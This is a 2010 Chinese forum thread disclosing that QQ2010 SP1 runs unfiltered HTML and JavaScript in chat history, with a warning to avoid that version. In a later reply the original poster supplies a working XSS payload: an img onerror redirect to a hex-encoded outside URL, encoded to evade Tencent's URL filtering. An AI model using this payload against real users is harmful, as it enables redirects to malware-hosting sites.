和山论坛

 找回密码
 会员注册
查看: 2121|回复: 10
打印 上一主题 下一主题

QQ2010 SP1版本高危漏洞演示

[复制链接]
跳转到指定楼层
楼主
发表于 2010-7-28 17:50 | 只看该作者 |只看大图 回帖奖励 |倒序浏览 |阅读模式
QQ2010 SP1 版本在聊天记录以及消息盒子中没有过滤html及js
查看聊天记录的时候语句将被执行
别有目的的人可以构造特殊代码挂马 以下是漏洞演示



建议:腾讯更新前停止使用QQ2010 SP1版本的QQ 如发现有人给你发送一堆乱七八糟的代码千万不要去查看聊天记录
沙发
发表于 2010-7-28 18:27 | 只看该作者
感觉好~专业
回复 支持 反对

使用道具 举报

板凳
发表于 2010-7-28 18:33 | 只看该作者
谢谢帅哥提醒,TX太垃圾
回复 支持 反对

使用道具 举报

地板
发表于 2010-7-28 18:55 | 只看该作者
幸好戒了qq了。
回复 支持 反对

使用道具 举报

5
发表于 2010-7-28 19:10 | 只看该作者
很强大
回复 支持 反对

使用道具 举报

6
发表于 2010-7-28 23:45 | 只看该作者
TX有补丁了,不过要自己主动升级
帮助——在线升级
TX太黑了,既想挽回,又不敢公布!
回复 支持 反对

使用道具 举报

7
发表于 2010-7-29 14:43 | 只看该作者
好专业
回复 支持 反对

使用道具 举报

8
发表于 2010-7-29 16:48 | 只看该作者
回复 6楼 wilcool


    嗯。我已经更新掉了
回复 支持 反对

使用道具 举报

9
发表于 2010-7-31 09:37 | 只看该作者
跪求代码
回复 支持 反对

使用道具 举报

10
 楼主| 发表于 2010-7-31 11:39 | 只看该作者
回复 9楼 Due

  1. <img src='xz' onerror="window.location='\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x78\x7A\x6C\x62\x62\x2E\x63\x6F\x6D'"/>
复制代码


window.location='    '
单引号里是网址 因为腾讯会处理正常的url所以经过了hex加密
回复 支持 反对

使用道具 举报

11
发表于 2010-8-1 11:02 | 只看该作者
相当强大
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 会员注册

本版积分规则


浙江科技学院和山论坛|手机客户端|小黑屋|和山论坛

GMT+8, 2025-5-5 23:43 , Processed in 0.138163 second(s), 25 queries , Gzip On.

Powered by Discuz! X3.2

© 2005-2019 和山论坛(www.hsbbs.com)

快速回复 返回顶部 返回列表